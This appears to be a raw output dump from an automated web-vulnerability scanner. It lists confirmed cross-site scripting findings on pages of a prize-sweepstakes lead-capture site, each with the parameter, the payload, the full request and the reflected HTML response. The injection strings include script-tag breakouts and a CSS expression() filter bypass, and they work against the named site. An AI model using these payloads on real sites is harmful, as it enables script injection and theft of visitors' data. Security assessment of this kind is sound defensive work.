Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7480
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><script src="http://cdn.weekly-prizes.com/include/gen_validatorv4.js" type="text/javascript"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Your Prize... One Moment Please</title><style type="text/css">a { font-size: 12px; color: #333;}a:link { color: #999;}a:visited { color: #999;}a:hover { color: #999;}a:active { color: #999;}#submitbutton { margin-top: 30px; width: 300px; text-align: center; font-size: 18px; } .field { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; text-align:center; } .fieldtext { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; }input.btn1 {color:#000border-color:#000 #000 #000 #000;background-color:#0C0;border: 1px solid;}</style><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/jquery1.5.0.js"></script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/autotab.js"></script></head><body onload="document.info.firstname.focus();"><center><img src="http://cdn.weekly-prizes.com/img/contactinfo.png" /><br /><br /></center><center><form name="info" id="info" action="reserving.php" method="get"><table border="0"><tbody><tr><td width="115">First Name: </td><td width="220"><input name="firstname" id="firstname" class="fieldtext" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorfirstname" style="display: none;">Not a Valid First Name</div></font></b></td></tr><tr><td>Last Name:</td><td><input name="lastname" class="fieldtext" id="lastname" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr> <td>E-Mail:</td> <td><input name="email" id="email" type="text" class="fieldtext" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'" size="30" maxlength="40" /></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorlastname" style="display: none;">Not a Valid Last Name</div></font></b></td></tr><tr><td class="label">Mobile Number:</td><td class="input" style="font-size:16px;"><input type='text' class="field" id='cphone1' name='cphone1' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone2' name='cphone2' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone3' name='cphone3' value='' maxlength='4' style='width: 57px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td><td width="0"><div id="4" class="error"></div></td> </tr><tr> <td colspan="2" align="left"></td></tr><tr> <td colspan="2" align="left"> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td><label style="padding: 2px"><input name="gametester" type="checkbox" id="gametester" value="1" /> I am interested being a paid video game tester from home.</label></td> </tr> <tr> <td><label style="padding: 2px"><input name="coreg_10" type="checkbox" id="coreg_10" value="1" /> I am interested in grants from the US Government</label></td> </tr> </table> </td></tr><tr><td colspan="2" align="center" valign="top"><input name="subid" type="hidden" id="subid" value="154" /><input name="c" type="hidden" id="c" value="\'\"--></style></script><script>netsparker(0x000146)</script>" /><input name="sid" type="hidden" id="sid" value="3" /><input name="tt" type="hidden" id="tt" value="0" /><input value="Click Here To Continue" id="submitbutton" type="submit"></td></tr></tbody></table></form> <script type="text/javascript"> var frmvalidator = new Validator("info"); frmvalidator.addValidation("firstname","req","Please enter your First Name so we know who to send the prize to."); frmvalidator.addValidation("firstname","maxlen=20", "Max length for FirstName is 20"); frmvalidator.addValidation("lastname","req","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("lastname","maxlen=20","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("email","maxlen=50","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","req","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","email","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("cphone1","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone1","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","minlen=4","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings.");$(document).ready(function(){$('#cphone1').autotab({target:$('#cphone2'), format:'numeric'});$('#cphone2').autotab({target:$('#cphone3'), format:'numeric'});$('#cphone3').autotab_filter({format:'numeric'});});</script><br /> <br /> <br /> <br /> <br /> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="privacy.php" target="_blank">Privacy Policy</a></td> </tr></table></center></body></html>

- /1.php

/1.php CONFIRMED

http://weekly-prizes.com/1.php?c='%20stYle='x:expre/**/ssion(alert(9))%20&subid=154

Parameters

Parameter	Type	Value
c	GET	' stYle='x:expre/**/ssion(alert(9))
subid	GET	154

Request

GET /1.php?c='%20stYle='x:expre/**/ssion(netsparker(9))%20&subid=154 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:22:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 2262
Connection: close
Content-Type: text/html

<html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" /><title>You Are Today's Lucky Winner</title> <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><style type="text/css" media="screen">a:link, a:active, a:visited { text-decoration: underline; color: #4833ac;}a:hover { color: #4833ac;}body { font-family: "lucida grande" , tahoma, verdana, arial, sans-serif; font-size:11px; background-color: #ffffff; text-align: center; margin: 0px; padding: 0px;}#topWrapper { width: 100%; margin: 0px; padding: 0px; background-color: #3b5998;}#top { padding-top: 0px; padding-bottom: 0px; margin-top: 0px; margin-bottom: 0px; margin-left: auto; margin-right: auto; width: 750px; text-align: left; color: #ffffff; font-size: 35px; font-weight: bold;}#contentWrapper { width: 100%; background-color: #ffffff; margin-left: auto; margin-right: auto;}#content { width: 750px; margin-top: 0px; margin-bottom: 0px; margin-left: auto; margin-right: auto; text-align: left;}#bottom { width: 750px; margin-top: 0px; margin-bottom: 0px; margin-left: auto; margin-right: auto; color: #737373; font-size: 11px; font-family: Verdana,Arial,Helvetica,sans-serif; text-align: center;}#txt { border:none; font-size: 16px; font-weight:bold; color: red; width: 57px; border-right-color:#FFFFFF}hr { height: 0; border: 0; border-top: 2px solid #d3d3d3; height: 2px;}</style><script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script></head><body><div id="top"><img src="http://cdn.weekly-prizes.com/img/top2.gif"></div> <div id="content"></div> <div><center> <br> <img src="http://cdn.weekly-prizes.com/img/loading.gif" /><span style="font:18px arial,sans-serif; font-weight:bold;">Reserving Your Prize</span></center><iframe src='1-frame.php?subid=154&sid=&c=\' stYle=\'x:expre/**/ssion(netsparker(9)) &tt=' width="100%" height="900" scrolling="no" frameborder="0"><a href="1-frame.php?subid=154">Click here to continue</a><meta http-equiv="refresh" content="2;url='1-frame.php'"></iframe> </td> </tr> </tbody></table></div></body></html>

- /reserving.php

/reserving.php CONFIRMED

http://weekly-prizes.com/reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netspa..

Parameters

Parameter	Type	Value
firstname	GET	Ronald Smith
lastname	GET	Ronald Smith
email	GET	netsparker@example.com
cphone1	GET	3
cphone2	GET	3
cphone3	GET	3
subid	GET	'"--></style></script><script>alert(0x0002B2)</script>
c	GET	3
sid	GET	3
tt	GET	0

Request

GET /reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netsparker@example.com&cphone1=3&cphone2=3&cphone3=3&subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B2)%3C/script%3E&c=3&sid=3&tt=0 HTTP/1.1
Referer: http://weekly-prizes.com/1-frame.php?subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:22:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 4848
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Prize...</title><meta http-equiv="Refresh" content="1;URL=http://gtoffers.com/coreg/entry.php?p=xa26g64656&limit=6&exit=1&phone=333&fname=Ronald+Smith&lname=Ronald+Smith&op=http%3A%2F%2Fcdn.weekly-prizes.com%2Fimg%2Fiphoneipad.jpg&sid=\\\'\\\"--></style></script><script>netsparker(0x0002B2)</script>-3-&redirect=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1939%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002B2%29%3C%2Fscript%3E%26pubSubID2%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002B2%29%3C%2Fscript%3E3%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002B2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002B2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D&exit_url=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1939%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002B2%29%3C%2Fscript%3E%26pubSubID2%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002B2%29%3C%2Fscript%3E3%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002B2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002B2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D" /><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script></head><body><p align="center"><strong> Reserving...Please Wait...<br /><br /><img src="http://cdn.findlocaljobsnow.com/images/loading.gif" width="50" height="50" /></strong></p></body></html>

- /1-frame.php

/1-frame.php CONFIRMED

http://weekly-prizes.com/1-frame.php?c=3&coreg_10=1&cphone1=3&cphone2=3&cphone3=3&email=netsparker@e..

Parameters

Parameter	Type	Value
c	GET	3
coreg_10	GET	1
cphone1	GET	3
cphone2	GET	3
cphone3	GET	3
email	GET	netsparker@example.com
firstname	GET	Ronald Smith
gametester	GET	1
lastname	GET	Ronald Smith
sid	GET	'"--></style></script><script>alert(0x0002BA)</script>
subid	GET	3
tt	GET	0

Request

GET /1-frame.php?c=3&coreg_10=1&cphone1=3&cphone2=3&cphone3=3&email=netsparker@example.com&firstname=Ronald%20Smith&gametester=1&lastname=Ronald%20Smith&sid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002BA)%3C/script%3E&subid=3&tt=0 HTTP/1.1
Referer: http://weekly-prizes.com/1-frame.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:22:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7478
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><script src="http://cdn.weekly-prizes.com/include/gen_validatorv4.js" type="text/javascript"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Your Prize... One Moment Please</title><style type="text/css">a { font-size: 12px; color: #333;}a:link { color: #999;}a:visited { color: #999;}a:hover { color: #999;}a:active { color: #999;}#submitbutton { margin-top: 30px; width: 300px; text-align: center; font-size: 18px; } .field { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; text-align:center; } .fieldtext { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; }input.btn1 {color:#000border-color:#000 #000 #000 #000;background-color:#0C0;border: 1px solid;}</style><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/jquery1.5.0.js"></script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/autotab.js"></script></head><body onload="document.info.firstname.focus();"><center><img src="http://cdn.weekly-prizes.com/img/contactinfo.png" /><br /><br /></center><center><form name="info" id="info" action="reserving.php" method="get"><table border="0"><tbody><tr><td width="115">First Name: </td><td width="220"><input name="firstname" id="firstname" class="fieldtext" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorfirstname" style="display: none;">Not a Valid First Name</div></font></b></td></tr><tr><td>Last Name:</td><td><input name="lastname" class="fieldtext" id="lastname" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr> <td>E-Mail:</td> <td><input name="email" id="email" type="text" class="fieldtext" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'" size="30" maxlength="40" /></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorlastname" style="display: none;">Not a Valid Last Name</div></font></b></td></tr><tr><td class="label">Mobile Number:</td><td class="input" style="font-size:16px;"><input type='text' class="field" id='cphone1' name='cphone1' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone2' name='cphone2' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone3' name='cphone3' value='' maxlength='4' style='width: 57px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td><td width="0"><div id="4" class="error"></div></td> </tr><tr> <td colspan="2" align="left"></td></tr><tr> <td colspan="2" align="left"> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td><label style="padding: 2px"><input name="gametester" type="checkbox" id="gametester" value="1" /> I am interested being a paid video game tester from home.</label></td> </tr> <tr> <td><label style="padding: 2px"><input name="coreg_10" type="checkbox" id="coreg_10" value="1" /> I am interested in grants from the US Government</label></td> </tr> </table> </td></tr><tr><td colspan="2" align="center" valign="top"><input name="subid" type="hidden" id="subid" value="3" /><input name="c" type="hidden" id="c" value="3" /><input name="sid" type="hidden" id="sid" value="\'\"--></style></script><script>netsparker(0x0002BA)</script>" /><input name="tt" type="hidden" id="tt" value="0" /><input value="Click Here To Continue" id="submitbutton" type="submit"></td></tr></tbody></table></form> <script type="text/javascript"> var frmvalidator = new Validator("info"); frmvalidator.addValidation("firstname","req","Please enter your First Name so we know who to send the prize to."); frmvalidator.addValidation("firstname","maxlen=20", "Max length for FirstName is 20"); frmvalidator.addValidation("lastname","req","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("lastname","maxlen=20","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("email","maxlen=50","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","req","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","email","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("cphone1","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone1","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","minlen=4","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings.");$(document).ready(function(){$('#cphone1').autotab({target:$('#cphone2'), format:'numeric'});$('#cphone2').autotab({target:$('#cphone3'), format:'numeric'});$('#cphone3').autotab_filter({format:'numeric'});});</script><br /> <br /> <br /> <br /> <br /> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="privacy.php" target="_blank">Privacy Policy</a></td> </tr></table></center></body></html>

- /reserving.php

/reserving.php CONFIRMED

http://weekly-prizes.com/reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netspa..

Parameters

Parameter	Type	Value
firstname	GET	Ronald Smith
lastname	GET	Ronald Smith
email	GET	netsparker@example.com
cphone1	GET	3
cphone2	GET	3
cphone3	GET	3
gametester	GET	1
coreg_10	GET	1
subid	GET	'"--></style></script><script>alert(0x0002C2)</script>
c	GET	3
sid	GET	3
tt	GET	0

Request

GET /reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netsparker@example.com&cphone1=3&cphone2=3&cphone3=3&gametester=1&coreg_10=1&subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002C2)%3C/script%3E&c=3&sid=3&tt=0 HTTP/1.1
Referer: http://weekly-prizes.com/1-frame.php?subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:22:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 4848
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Prize...</title><meta http-equiv="Refresh" content="1;URL=http://gtoffers.com/coreg/entry.php?p=xa26g64656&limit=6&exit=1&phone=333&fname=Ronald+Smith&lname=Ronald+Smith&op=http%3A%2F%2Fcdn.weekly-prizes.com%2Fimg%2Fiphoneipad.jpg&sid=\\\'\\\"--></style></script><script>netsparker(0x0002C2)</script>-3-&redirect=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1990%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002C2%29%3C%2Fscript%3E%26pubSubID2%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002C2%29%3C%2Fscript%3E3%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002C2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002C2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D&exit_url=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1990%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002C2%29%3C%2Fscript%3E%26pubSubID2%3D%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002C2%29%3C%2Fscript%3E3%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002C2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D%255C%2527%255C%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0002C2%2529%253C%252Fscript%253E%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D" /><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js 